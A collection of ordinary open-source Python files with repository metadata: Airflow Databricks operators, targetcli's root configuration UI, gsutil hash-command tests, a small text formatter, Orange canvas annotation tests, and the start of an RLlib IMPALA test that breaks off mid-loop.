*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobssparkpythontask
:type spark_python_task: dict
:param spark_submit_task: Parameters needed to run a spark-submit command.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobssparksubmittask
:type spark_submit_task: dict
:param new_cluster: Specs for a new cluster on which this task will be run.
*EITHER* ``new_cluster`` *OR* ``existing_cluster_id`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobsclusterspecnewcluster
:type new_cluster: dict
:param existing_cluster_id: ID for existing cluster on which to run this task.
*EITHER* ``new_cluster`` *OR* ``existing_cluster_id`` should be specified.
This field will be templated.
:type existing_cluster_id: str
:param libraries: Libraries which this run will use.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/libraries.html#managedlibrarieslibrary
:type libraries: list of dicts
:param run_name: The run name used for this task.
By default this will be set to the Airflow ``task_id``. This ``task_id`` is a
required parameter of the superclass ``BaseOperator``.
This field will be templated.
:type run_name: str
:param timeout_seconds: The timeout for this run. By default a value of 0 is used
which means to have no timeout.
This field will be templated.
:type timeout_seconds: int32
:param databricks_conn_id: Reference to the :ref:`Databricks connection <howto/connection:databricks>`.
By default and in the common case this will be ``databricks_default``. To use
token based authentication, provide the key ``token`` in the extra field for the
connection and create the key ``host`` and leave the ``host`` field empty.
:type databricks_conn_id: str
:param polling_period_seconds: Controls the rate which we poll for the result of
this run. By default the operator will poll every 30 seconds.
:type polling_period_seconds: int
    :param databricks_retry_limit: Amount of times to retry if the Databricks backend is
unreachable. Its value must be greater than or equal to 1.
:type databricks_retry_limit: int
:param databricks_retry_delay: Number of seconds to wait between retries (it
might be a floating point number).
:type databricks_retry_delay: float
:param do_xcom_push: Whether we should push run_id and run_page_url to xcom.
:type do_xcom_push: bool
"""
# Used in airflow.models.BaseOperator
template_fields = ('json',)
# Databricks brand color (blue) under white text
ui_color = '#1CB1C2'
ui_fgcolor = '#fff'
def __init__(
self,
*,
json: Optional[Any] = None,
spark_jar_task: Optional[Dict[str, str]] = None,
notebook_task: Optional[Dict[str, str]] = None,
spark_python_task: Optional[Dict[str, Union[str, List[str]]]] = None,
spark_submit_task: Optional[Dict[str, List[str]]] = None,
new_cluster: Optional[Dict[str, object]] = None,
existing_cluster_id: Optional[str] = None,
libraries: Optional[List[Dict[str, str]]] = None,
run_name: Optional[str] = None,
timeout_seconds: Optional[int] = None,
databricks_conn_id: str = 'databricks_default',
polling_period_seconds: int = 30,
databricks_retry_limit: int = 3,
databricks_retry_delay: int = 1,
do_xcom_push: bool = False,
**kwargs,
) -> None:
"""Creates a new ``DatabricksSubmitRunOperator``."""
super().__init__(**kwargs)
self.json = json or {}
self.databricks_conn_id = databricks_conn_id
self.polling_period_seconds = polling_period_seconds
self.databricks_retry_limit = databricks_retry_limit
self.databricks_retry_delay = databricks_retry_delay
if spark_jar_task is not None:
self.json['spark_jar_task'] = spark_jar_task
if notebook_task is not None:
self.json['notebook_task'] = notebook_task
if spark_python_task is not None:
self.json['spark_python_task'] = spark_python_task
if spark_submit_task is not None:
self.json['spark_submit_task'] = spark_submit_task
if new_cluster is not None:
self.json['new_cluster'] = new_cluster
if existing_cluster_id is not None:
self.json['existing_cluster_id'] = existing_cluster_id
if libraries is not None:
self.json['libraries'] = libraries
if run_name is not None:
self.json['run_name'] = run_name
if timeout_seconds is not None:
self.json['timeout_seconds'] = timeout_seconds
if 'run_name' not in self.json:
self.json['run_name'] = run_name or kwargs['task_id']
self.json = _deep_string_coerce(self.json)
# This variable will be used in case our task gets killed.
self.run_id = None
self.do_xcom_push = do_xcom_push
def _get_hook(self) -> DatabricksHook:
return DatabricksHook(
self.databricks_conn_id,
retry_limit=self.databricks_retry_limit,
retry_delay=self.databricks_retry_delay,
)
def execute(self, context):
hook = self._get_hook()
self.run_id = hook.submit_run(self.json)
_handle_databricks_operator_execution(self, hook, self.log, context)
def on_kill(self):
hook = self._get_hook()
hook.cancel_run(self.run_id)
self.log.info('Task: %s with run_id: %s was requested to be cancelled.', self.task_id, self.run_id)
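# Minimal DAG sketch; cluster spec, notebook path and dates are placeholder
# values, not taken from this provider.
def _demo_dag():
    from datetime import datetime
    from airflow import DAG
    with DAG('databricks_demo', start_date=datetime(2021, 1, 1), schedule_interval=None) as dag:
        DatabricksSubmitRunOperator(
            task_id='notebook_run',
            new_cluster={'spark_version': '7.3.x-scala2.12', 'num_workers': 2},
            notebook_task={'notebook_path': '/Users/someone@example.com/PrepareData'},
        )
    return dag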
class DatabricksRunNowOperator(BaseOperator):
"""
Runs an existing Spark job run to Databricks using the
`api/2.0/jobs/run-now
<https://docs.databricks.com/api/latest/jobs.html#run-now>`_
API endpoint.
There are two ways to instantiate this operator.
In the first way, you can take the JSON payload that you typically use
to call the ``api/2.0/jobs/run-now`` endpoint and pass it directly
to our ``DatabricksRunNowOperator`` through the ``json`` parameter.
For example ::
json = {
"job_id": 42,
"notebook_params": {
"dry-run": "true",
"oldest-time-to-consider": "1457570074236"
}
}
notebook_run = DatabricksRunNowOperator(task_id='notebook_run', json=json)
Another way to accomplish the same thing is to use the named parameters
of the ``DatabricksRunNowOperator`` directly. Note that there is exactly
one named parameter for each top level parameter in the ``run-now``
endpoint. In this method, your code would look like this: ::
job_id=42
notebook_params = {
"dry-run": "true",
"oldest-time-to-consider": "1457570074236"
}
python_params = ["douglas adams", "42"]
spark_submit_params = ["--class", "org.apache.spark.examples.SparkPi"]
notebook_run = DatabricksRunNowOperator(
job_id=job_id,
notebook_params=notebook_params,
python_params=python_params,
spark_submit_params=spark_submit_params
)
In the case where both the json parameter **AND** the named parameters
are provided, they will be merged together. If there are conflicts during the merge,
the named parameters will take precedence and override the top level ``json`` keys.
Currently the named parameters that ``DatabricksRunNowOperator`` supports are
- ``job_id``
- ``json``
- ``notebook_params``
- ``python_params``
- ``spark_submit_params``
:param job_id: the job_id of the existing Databricks job.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#run-now
:type job_id: str
:param json: A JSON object containing API parameters which will be passed
directly to the ``api/2.0/jobs/run-now`` endpoint. The other named parameters
(i.e. ``notebook_params``, ``spark_submit_params``..) to this operator will
be merged with this json dictionary if they are provided.
If there are conflicts during the merge, the named parameters will
take precedence and override the top level json keys. (templated)
.. seealso::
For more information about templating see :ref:`concepts:jinja-templating`.
https://docs.databricks.com/api/latest/jobs.html#run-now
:type json: dict
:param notebook_params: A dict from keys to values for jobs with notebook task,
e.g. "notebook_params": {"name": "john doe", "age": "35"}.
The map is passed to the notebook and will be accessible through the
dbutils.widgets.get function. See Widgets for more information.
If not specified upon run-now, the triggered run will use the
job’s base parameters. notebook_params cannot be
specified in conjunction with jar_params. The json representation
of this field (i.e. {"notebook_params":{"name":"john doe","age":"35"}})
cannot exceed 10,000 bytes.
This field will be templated.
.. seealso::
https://docs.databricks.com/user-guide/notebooks/widgets.html
:type notebook_params: dict
:param python_params: A list of parameters for jobs with python tasks,
e.g. "python_params": ["john doe", "35"].
The parameters will be passed to python file as command line parameters.
If specified upon run-now, it would overwrite the parameters specified in
the job setting.
The json representation of this field (i.e. {"python_params":["john doe","35"]})
cannot exceed 10,000 bytes.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#run-now
:type python_params: list[str]
:param spark_submit_params: A list of parameters for jobs with spark submit task,
e.g. "spark_submit_params": ["--class", "org.apache.spark.examples.SparkPi"].
The parameters will be passed to spark-submit script as command line parameters.
If specified upon run-now, it would overwrite the parameters specified
in the job setting.
The json representation of this field cannot exceed 10,000 bytes.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#run-now
:type spark_submit_params: list[str]
:param timeout_seconds: The timeout for this run. By default a value of 0 is used
which means to have no timeout.
This field will be templated.
:type timeout_seconds: int32
:param databricks_conn_id: Reference to the :ref:`Databricks connection <howto/connection:databricks>`.
By default and in the common case this will be ``databricks_default``. To use
token based authentication, provide the key ``token`` in the extra field for the
connection, add the key ``host`` to the extra field as well, and leave the
connection's ``host`` field empty.
:type databricks_conn_id: str
:param polling_period_seconds: Controls the rate which we poll for the result of
this run. By default the operator will poll every 30 seconds.
:type polling_period_seconds: int
:param databricks_retry_limit: Amount of times to retry if the Databricks backend is
unreachable. Its value must be greater than or equal to 1.
:type databricks_retry_limit: int
:param databricks_retry_delay: Number of seconds to wait between retries.
:type databricks_retry_delay: int
:param do_xcom_push: Whether we should push run_id and run_page_url to xcom.
:type do_xcom_push: bool
"""
# Used in airflow.models.BaseOperator
template_fields = ('json',)
# Databricks brand color (blue) under white text
ui_color = '#1CB1C2'
ui_fgcolor = '#fff'
def __init__(
self,
*,
job_id: Optional[str] = None,
json: Optional[Any] = None,
notebook_params: Optional[Dict[str, str]] = None,
python_params: Optional[List[str]] = None,
spark_submit_params: Optional[List[str]] = None,
databricks_conn_id: str = 'databricks_default',
polling_period_seconds: int = 30,
databricks_retry_limit: int = 3,
databricks_retry_delay: int = 1,
do_xcom_push: bool = False,
**kwargs,
) -> None:
"""Creates a new ``DatabricksRunNowOperator``."""
super().__init__(**kwargs)
self.json = json or {}
self.databricks_conn_id = databricks_conn_id
self.polling_period_seconds = polling_period_seconds
self.databricks_retry_limit = databricks_retry_limit
self.databricks_retry_delay = databricks_retry_delay
if job_id is not None:
self.json['job_id'] = job_id
if notebook_params is not None:
self.json['notebook_params'] = notebook_params
if python_params is not None:
self.json['python_params'] = python_params
if spark_submit_params is not None:
self.json['spark_submit_params'] = spark_submit_params
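# Databricks expects job parameter values as strings; coerce any
# non-string leaves (ints, bools, etc.) recursively before submission.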
self.json = _deep_string_coerce(self.json)
# This variable will be used in case our task gets killed.
self.run_id = None
self.do_xcom_push = do_xcom_push
def _get_hook(self) -> DatabricksHook:
return DatabricksHook(
self.databricks_conn_id,
retry_limit=self.databricks_retry_limit,
retry_delay=self.databricks_retry_delay,
)
def execute(self, context):
hook = self._get_hook()
self.run_id = hook.run_now(self.json)
_handle_databricks_operator_execution(self, hook, self.log, context)
def on_kill(self):
hook = self._get_hook()
hook.cancel_run(self.run_id)
self.log.info('Task: %s with run_id: %s was requested to be cancelled.', self.task_id, self.run_id)
| {
"content_hash": "020673fb3dcdfe4849641c33c2584d64",
"timestamp": "",
"source": "github",
"line_count": 493,
"max_line_length": 107,
"avg_line_length": 43.36511156186612,
"alnum_prop": 0.6406286542869171,
"repo_name": "dhuang/incubator-airflow",
"id": "8956b43be1de76859fb3176980427221e7319d3c",
"size": "22170",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "airflow/providers/databricks/operators/databricks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109698"
},
{
"name": "HTML",
"bytes": "264851"
},
{
"name": "JavaScript",
"bytes": "1988427"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "3357958"
},
{
"name": "Shell",
"bytes": "34442"
}
],
"symlink_target": ""
} |
'''
Implements the targetcli root UI.
This file is part of targetcli.
Copyright (c) 2011-2013 by Datera, Inc
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
'''
from datetime import datetime
from glob import glob
import os
import re
import shutil
import stat
import filecmp
import gzip
from configshell_fb import ExecutionError
from rtslib_fb import RTSRoot
from rtslib_fb.utils import ignored
from .ui_backstore import complete_path, UIBackstores
from .ui_node import UINode
from .ui_target import UIFabricModule
default_save_file = "/etc/target/saveconfig.json"
universal_prefs_file = "/etc/target/targetcli.conf"
class UIRoot(UINode):
'''
The targetcli hierarchy root node.
'''
def __init__(self, shell, as_root=False):
UINode.__init__(self, '/', shell=shell)
self.as_root = as_root
self.rtsroot = RTSRoot()
def refresh(self):
'''
Refreshes the tree of target fabric modules.
'''
self._children = set([])
# Invalidate any rtslib caches
if 'invalidate_caches' in dir(RTSRoot):
self.rtsroot.invalidate_caches()
UIBackstores(self)
# only show fabrics present in the system
for fm in self.rtsroot.fabric_modules:
if fm.wwns is None or any(fm.wwns):
UIFabricModule(fm, self)
def _compare_files(self, backupfile, savefile):
'''
Compare the backup file and the saveconfig file.
'''
fdata_bkp = None
if os.path.splitext(backupfile)[1] == '.gz':
try:
with gzip.open(backupfile, 'rb') as fbkp:
fdata_bkp = fbkp.read()
except IOError as e:
self.shell.log.warning("Could not gzip open backupfile %s: %s"
% (backupfile, e.strerror))
else:
try:
with open(backupfile, 'rb') as fbkp:
fdata_bkp = fbkp.read()
except IOError as e:
self.shell.log.warning("Could not open backupfile %s: %s"
% (backupfile, e.strerror))
fdata = None
try:
with open(savefile, 'rb') as f:
fdata = f.read()
except IOError as e:
self.shell.log.warning("Could not open saveconfig file %s: %s"
% (savefile, e.strerror))
return fdata_bkp == fdata
def _create_dir(self, dirname):
'''
Create a directory with permissions 0o600.
If the directory already exists, set the right permissions.
'''
mode = stat.S_IRUSR | stat.S_IWUSR # 0o600
if not os.path.exists(dirname):
umask = 0o777 ^ mode # Prevents always downgrading umask to 0
umask_original = os.umask(umask)
try:
os.makedirs(dirname, mode)
except OSError as exe:
raise ExecutionError("Cannot create directory [%s] %s."
% (dirname, exe.strerror))
finally:
os.umask(umask_original)
else:
if (os.stat(dirname).st_mode & 0o777) != mode:
os.chmod(dirname, mode)
def _save_backups(self, savefile):
'''
Take backup of config-file if needed.
'''
# Only save backups if saving to default location
if savefile != default_save_file:
return
backup_dir = os.path.dirname(savefile) + "/backup/"
backup_name = "saveconfig-" + \
datetime.now().strftime("%Y%m%d-%H:%M:%S") + "-json.gz"
backupfile = backup_dir + backup_name
backup_error = None
self._create_dir(backup_dir)
# Only save backups if savefile exists
if not os.path.exists(savefile):
return
backed_files_list = sorted(glob(os.path.dirname(savefile) + \
"/backup/saveconfig-*json*"))
# Save a backup if the backup dir is empty, or savefile differs from the most recent backup copy
if not backed_files_list or not self._compare_files(backed_files_list[-1], savefile):
mode = stat.S_IRUSR | stat.S_IWUSR # 0o600
umask = 0o777 ^ mode # Prevents always downgrading umask to 0
umask_original = os.umask(umask)
try:
with open(savefile, 'rb') as f_in, gzip.open(backupfile, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
f_out.flush()
except IOError as ioe:
backup_error = ioe.strerror or "Unknown error"
finally:
os.umask(umask_original)
if backup_error is None:
# remove excess backups
max_backup_files = int(self.shell.prefs['max_backup_files'])
try:
with open(universal_prefs_file) as prefs:
backups = [line for line in prefs.read().splitlines() if re.match(r'^max_backup_files\s*=', line)]
if max_backup_files < int(backups[0].split('=')[1].strip()):
max_backup_files = int(backups[0].split('=')[1].strip())
except:
self.shell.log.debug("No universal prefs file '%s'." % universal_prefs_file)
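# The backup just written above is not yet in backed_files_list, so
# keep only (max_backup_files - 1) of the previously saved files.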
files_to_unlink = list(reversed(backed_files_list))[max_backup_files - 1:]
for f in files_to_unlink:
with ignored(IOError):
os.unlink(f)
self.shell.log.info("Last %d configs saved in %s."
% (max_backup_files, backup_dir))
else:
self.shell.log.warning("Could not create backup file %s: %s."
% (backupfile, backup_error))
def ui_command_saveconfig(self, savefile=default_save_file):
'''
Saves the current configuration to a file so that it can be restored
on next boot.
'''
self.assert_root()
if not savefile:
savefile = default_save_file
savefile = os.path.expanduser(savefile)
save_dir = os.path.dirname(savefile)
self._create_dir(save_dir)
self._save_backups(savefile)
self.rtsroot.save_to_file(savefile)
self.shell.log.info("Configuration saved to %s" % savefile)
def ui_command_restoreconfig(self, savefile=default_save_file, clear_existing=False,
target=None, storage_object=None):
'''
Restores configuration from a file.
'''
self.assert_root()
savefile = os.path.expanduser(savefile)
if not os.path.isfile(savefile):
self.shell.log.info("Restore file %s not found" % savefile)
return
target = self.ui_eval_param(target, 'string', None)
storage_object = self.ui_eval_param(storage_object, 'string', None)
errors = self.rtsroot.restore_from_file(savefile, clear_existing,
target, storage_object)
self.refresh()
if errors:
raise ExecutionError("Configuration restored, %d recoverable errors:\n%s" % \
(len(errors), "\n".join(errors)))
self.shell.log.info("Configuration restored from %s" % savefile)
def ui_complete_saveconfig(self, parameters, text, current_param):
'''
Auto-completes the file name
'''
if current_param != 'savefile':
return []
completions = complete_path(text, stat.S_ISREG)
if len(completions) == 1 and not completions[0].endswith('/'):
completions = [completions[0] + ' ']
return completions
ui_complete_restoreconfig = ui_complete_saveconfig
def ui_command_clearconfig(self, confirm=None):
'''
Removes entire configuration of backstores and targets
'''
self.assert_root()
confirm = self.ui_eval_param(confirm, 'bool', False)
self.rtsroot.clear_existing(confirm=confirm)
self.shell.log.info("All configuration cleared")
self.refresh()
def ui_command_version(self):
'''
Displays the targetcli and support libraries versions.
'''
from targetcli import __version__ as targetcli_version
self.shell.log.info("targetcli version %s" % targetcli_version)
def ui_command_sessions(self, action="list", sid=None):
'''
Displays a detailed list of all open sessions.
PARAMETERS
==========
action
------
The action is one of:
- `list` gives a short session list
- `detail` gives a detailed list
sid
---
You can specify an "sid" to only list this one,
with or without details.
SEE ALSO
========
status
'''
indent_step = 4
base_steps = 0
action_list = ("list", "detail")
if action not in action_list:
raise ExecutionError("action must be one of: %s" %
", ".join(action_list))
if sid is not None:
try:
int(sid)
except ValueError:
raise ExecutionError("sid must be a number, '%s' given" % sid)
def indent_print(text, steps):
console = self.shell.con
console.display(console.indent(text, indent_step * steps),
no_lf=True)
def print_session(session):
acl = session['parent_nodeacl']
indent_print("alias: %(alias)s\tsid: %(id)i type: " \
"%(type)s session-state: %(state)s" % session,
base_steps)
if action == 'detail':
if self.as_root:
if acl.authenticate_target:
auth = " (authenticated)"
else:
auth = " (NOT AUTHENTICATED)"
else:
auth = ""
indent_print("name: %s%s" % (acl.node_wwn, auth),
base_steps + 1)
for mlun in acl.mapped_luns:
plugin = mlun.tpg_lun.storage_object.plugin
name = mlun.tpg_lun.storage_object.name
if mlun.write_protect:
mode = "r"
else:
mode = "rw"
indent_print("mapped-lun: %d backstore: %s/%s mode: %s" %
(mlun.mapped_lun, plugin, name, mode),
base_steps + 1)
for connection in session['connections']:
indent_print("address: %(address)s (%(transport)s) cid: " \
"%(cid)i connection-state: %(cstate)s" % \
connection, base_steps + 1)
if sid:
printed_sessions = [x for x in self.rtsroot.sessions if x['id'] == int(sid)]
else:
printed_sessions = list(self.rtsroot.sessions)
if len(printed_sessions):
for session in printed_sessions:
print_session(session)
else:
if sid is None:
indent_print("(no open sessions)", base_steps)
else:
raise ExecutionError("no session found with sid %i" % int(sid))
| {
"content_hash": "1db0797f4b30ed24cf7737293062a899",
"timestamp": "",
"source": "github",
"line_count": 345,
"max_line_length": 121,
"avg_line_length": 35.118840579710145,
"alnum_prop": 0.5332618025751072,
"repo_name": "agrover/targetcli-fb",
"id": "39e5ee99c342724df236646cfb42d7043c0008ae",
"size": "12116",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "targetcli/ui_root.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groff",
"bytes": "15840"
},
{
"name": "Makefile",
"bytes": "4583"
},
{
"name": "Python",
"bytes": "97525"
}
],
"symlink_target": ""
} |
"""Unit tests for hash command."""
import os
from gslib.exception import CommandException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.util import ObjectToURI as suri
_TEST_FILE_CONTENTS = '123456\n'
_TEST_FILE_B64_CRC = 'nYmSiA=='
_TEST_FILE_B64_MD5 = '9EeyCn/L9TpdW+AT6gsVrw=='
_TEST_FILE_HEX_CRC = '9D899288'
_TEST_FILE_HEX_MD5 = 'f447b20a7fcbf53a5d5be013ea0b15af'
_TEST_COMPOSITE_ADDED_CONTENTS = 'tmp'
_TEST_COMPOSITE_B64_CRC = 'M3DYBg=='
_TEST_COMPOSITE_HEX_CRC = '3370D806'
class TestHashUnit(testcase.GsUtilUnitTestCase):
"""Unit tests for hash command."""
def testHashContents(self):
tmp_file = self.CreateTempFile(contents=_TEST_FILE_CONTENTS)
stdout = self.RunCommand('hash', args=[tmp_file], return_stdout=True)
self.assertIn('Hashes [base64]', stdout)
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_B64_CRC, stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_B64_MD5, stdout)
def testHashNoMatch(self):
try:
self.RunCommand('hash', args=['non-existent-file'])
self.fail('Did not get expected CommandException')
except CommandException as e:
self.assertIn('No files matched', e.reason)
def testHashHexFormat(self):
tmp_file = self.CreateTempFile(contents=_TEST_FILE_CONTENTS)
stdout = self.RunCommand('hash', args=['-h', tmp_file], return_stdout=True)
self.assertIn('Hashes [hex]', stdout)
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_HEX_CRC, stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_HEX_MD5, stdout)
def testHashWildcard(self):
num_test_files = 2
tmp_dir = self.CreateTempDir(test_files=num_test_files)
stdout = self.RunCommand('hash', args=[os.path.join(tmp_dir, '*')],
return_stdout=True)
# One summary line and two hash lines per file.
num_expected_lines = num_test_files * (1 + 2)
self.assertEqual(len(stdout.splitlines()), num_expected_lines)
def testHashSelectAlg(self):
tmp_file = self.CreateTempFile(contents=_TEST_FILE_CONTENTS)
stdout_crc = self.RunCommand('hash', args=['-c', tmp_file],
return_stdout=True)
stdout_md5 = self.RunCommand('hash', args=['-m', tmp_file],
return_stdout=True)
stdout_both = self.RunCommand('hash', args=['-c', '-m', tmp_file],
return_stdout=True)
for stdout in (stdout_crc, stdout_both):
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_B64_CRC, stdout)
for stdout in (stdout_md5, stdout_both):
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_B64_MD5, stdout)
self.assertNotIn('md5', stdout_crc)
self.assertNotIn('crc32c', stdout_md5)
class TestHash(testcase.GsUtilIntegrationTestCase):
"""Integration tests for hash command."""
def testHashCloudObject(self):
"""Test hash command on a cloud object."""
obj1 = self.CreateObject(object_name='obj1', contents=_TEST_FILE_CONTENTS)
# Tests cloud object with -h.
stdout = self.RunGsUtil(['hash', '-h', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [hex]', stdout)
if self.default_provider == 'gs':
# Hex hashes for cloud objects get converted to lowercase but their
# meaning is the same.
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_HEX_CRC.lower(),
stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_HEX_MD5, stdout)
# Tests cloud object as base64.
stdout = self.RunGsUtil(['hash', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [base64]', stdout)
if self.default_provider == 'gs':
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_B64_CRC, stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_B64_MD5, stdout)
@SkipForS3('No composite object or crc32c support for S3.')
def testHashCompositeObject(self):
"""Test hash command on a composite object (which only has crc32c)."""
bucket = self.CreateBucket()
obj1 = self.CreateObject(bucket_uri=bucket, object_name='obj1',
contents=_TEST_FILE_CONTENTS)
obj2 = self.CreateObject(bucket_uri=bucket, object_name='tmp',
contents=_TEST_COMPOSITE_ADDED_CONTENTS)
self.RunGsUtil(['compose', suri(obj1), suri(obj2), suri(obj1)])
stdout = self.RunGsUtil(['hash', '-h', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [hex]', stdout)
# Hex hashes for cloud objects get converted to lowercase but their
# meaning is the same.
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_COMPOSITE_HEX_CRC.lower(),
stdout)
stdout = self.RunGsUtil(['hash', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [base64]', stdout)
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_COMPOSITE_B64_CRC, stdout)
| {
"content_hash": "c5b5ded1c52d55e06b62c001a700c28d",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 79,
"avg_line_length": 43.38053097345133,
"alnum_prop": 0.653406772745818,
"repo_name": "fishjord/gsutil",
"id": "c166c34eec4190c70316fd7f89e22facb2b77c8b",
"size": "5522",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "gslib/tests/test_hash.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2944776"
}
],
"symlink_target": ""
} |
class Formatter:
def __init__(self, key_points, fmt):
self._options = {
'default': self.default,
'md': self.md,
'json': self.json,
'html': self.html,
}
# Validate against the dispatch table itself; hasattr would also
# accept unrelated attribute names such as 'frmt' or '_kp'.
if fmt not in self._options:
raise ValueError("invalid option: use 'md', 'json' or 'html'")
self._fmt = fmt
self._kp = key_points
def frmt(self):
return self._options[self._fmt]()
def default(self):
return self._kp
def md(self):
fs = u""
for i in xrange(len(self._kp)):
fs += ">* {{{}}}\n".format(i)
return fs.format(*self._kp)
def json(self):
raise NotImplementedError
def html(self):
raise NotImplementedError
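# Illustrative usage sketch (hypothetical key points): the 'md' format
# renders the key points as a Markdown blockquote list.
# formatted = Formatter(["first point", "second point"], 'md').frmt()
# # -> ">* first point\n>* second point\n"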
| {
"content_hash": "7215b596b1fc88509e05bf5bfd1aaded",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 74,
"avg_line_length": 25.151515151515152,
"alnum_prop": 0.4566265060240964,
"repo_name": "lekhakpadmanabh/Summarizer",
"id": "f99e8e272561f5eb8f7a8e52004be11e985193fe",
"size": "830",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "smrzr/formatters.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9993"
}
],
"symlink_target": ""
} |
import math
import time
from AnyQt.QtGui import QColor
from AnyQt.QtCore import Qt, QRectF, QLineF
from ..annotationitem import TextAnnotation, ArrowAnnotation, ArrowItem
from . import TestItems
class TestAnnotationItem(TestItems):
def test_textannotation(self):
text = "Annotation"
annot = TextAnnotation()
annot.setPlainText(text)
self.assertEqual(annot.toPlainText(), text)
annot2 = TextAnnotation()
self.assertEqual(annot2.toPlainText(), "")
text = "This is an annotation"
annot2.setPlainText(text)
self.assertEqual(annot2.toPlainText(), text)
annot2.setDefaultTextColor(Qt.red)
control_rect = QRectF(0, 0, 100, 200)
annot2.setGeometry(control_rect)
self.assertEqual(annot2.geometry(), control_rect)
annot.setTextInteractionFlags(Qt.TextEditorInteraction)
annot.setPos(400, 100)
annot.adjustSize()
annot._TextAnnotation__textItem.setFocus()
self.scene.addItem(annot)
self.scene.addItem(annot2)
self.app.exec_()
def test_arrowannotation(self):
item = ArrowItem()
self.scene.addItem(item)
item.setLine(QLineF(100, 100, 100, 200))
item.setLineWidth(5)
item = ArrowItem()
item.setLine(QLineF(150, 100, 150, 200))
item.setLineWidth(10)
item.setArrowStyle(ArrowItem.Concave)
self.scene.addItem(item)
item = ArrowAnnotation()
item.setPos(10, 10)
item.setLine(QLineF(10, 10, 200, 200))
self.scene.addItem(item)
item.setLineWidth(5)
def advance():
clock = time.clock() * 10
item.setLineWidth(5 + math.sin(clock) * 5)
item.setColor(QColor(Qt.red).lighter(100 + 30 * math.cos(clock)))
self.singleShot(0, advance)
advance()
self.app.exec_()
| {
"content_hash": "df9e7893e62008817be8fda704882868",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 77,
"avg_line_length": 28.388059701492537,
"alnum_prop": 0.6272344900105152,
"repo_name": "cheral/orange3",
"id": "ec77bef642ed216f41ce5881a2ee31e495c2e83b",
"size": "1902",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "Orange/canvas/canvas/items/tests/test_annotationitem.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "20412"
},
{
"name": "C++",
"bytes": "1992"
},
{
"name": "GLSL",
"bytes": "75"
},
{
"name": "HTML",
"bytes": "3503"
},
{
"name": "JavaScript",
"bytes": "12023"
},
{
"name": "Jupyter Notebook",
"bytes": "6662"
},
{
"name": "NSIS",
"bytes": "20217"
},
{
"name": "Python",
"bytes": "4139574"
},
{
"name": "Shell",
"bytes": "47441"
}
],
"symlink_target": ""
} |
import unittest
import ray
import ray.rllib.agents.impala as impala
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.test_utils import check_compute_single_action, \
framework_iterator
tf1, tf, tfv = try_import_tf()
class TestIMPALA(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
ray.init()
@classmethod
def tearDownClass(cls) -> None:
ray.shutdown()
def test_impala_compilation(self):
"""Test whether an ImpalaTrainer can be built with both frameworks."""
config = impala.DEFAULT_CONFIG.copy()
num_iterations = 1
for _ in framework_iterator(config):
local_cfg = config.copy()
for env in ["Pendulum-v0", "CartPole-v0"]:
print("Env={}".format(env))
print("w/o LSTM")
# Test w/o LSTM.
local_cfg["model"]["use_lstm"] = False
local_cfg["num_aggregation_workers"] = 0
trainer = impala.ImpalaTrainer(config=local_cfg, env=env)
for i in range(num_iterations):
print(trainer.train())
check_compute_single_action(trainer)
trainer.stop()
# Test w/ LSTM.
print("w/ LSTM")
local_cfg["model"]["use_lstm"] = True
local_cfg["model"]["lstm_use_prev_action"] = True
local_cfg["model"]["lstm_use_prev_reward"] = True
local_cfg["num_aggregation_workers"] = 2
trainer = impala.ImpalaTrainer(config=local_cfg, env=env)
for i in range(num_iterations):
